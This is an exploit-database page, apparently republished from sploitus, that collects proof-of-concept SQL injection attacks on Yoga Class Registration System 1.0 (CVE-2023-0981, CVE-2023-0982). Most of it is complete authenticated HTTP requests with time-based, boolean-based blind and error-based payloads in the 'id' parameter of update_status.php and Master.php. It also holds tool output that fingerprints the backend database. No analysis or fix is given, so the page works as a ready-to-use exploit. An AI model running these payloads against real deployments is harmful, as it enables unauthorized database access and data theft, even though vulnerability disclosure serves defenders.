Exploit for Yoga Class Registration System 1.0 SQL Injection Vulnerability CVE-2023-0981 CVE-2023-0982

Name: Exploit for Yoga Class Registration System 1.0 SQL Injection Vulnerability CVE-2023-0981 CVE-2023-0982
Rating: 5 (186 reviews)
2023-02-27 | CVSS 7.5
## https://sploitus.com/exploit?id=1337DAY-ID-38219
# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: [CVE-2023-0982]
# Tested on: Windows 11



# Payload


GET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer:
http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

##Payload

'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU



the back-end DBMS is MySQL

web application technology: PHP 8.0.25, Apache 2.4.54

back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)


# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: ( CVE-2023-0981 )
# Tested on: Windows 11

```
POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Origin: http://localhost
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=classes
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=96'
```

# Payload

Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery -
comment)
    Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE
(SELECT 8487 UNION SELECT 3172) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: id=96' AND (SELECT 4409 FROM(SELECT
COUNT(*),CONCAT(0x7162707671,(SELECT
(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ



# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: ( CVE-2023-0982 )
# Tested on: Windows 11


##Payload

POST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------408548517113152447833471217322
Content-Length: 286
Origin: http://localhost
Connection: close
Referer:
http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------408548517113152447833471217322
Content-Disposition: form-data; name="id"

2'
-----------------------------408548517113152447833471217322
Content-Disposition: form-data; name="status"

1
-----------------------------408548517113152447833471217322--

##Payload
'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU

the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)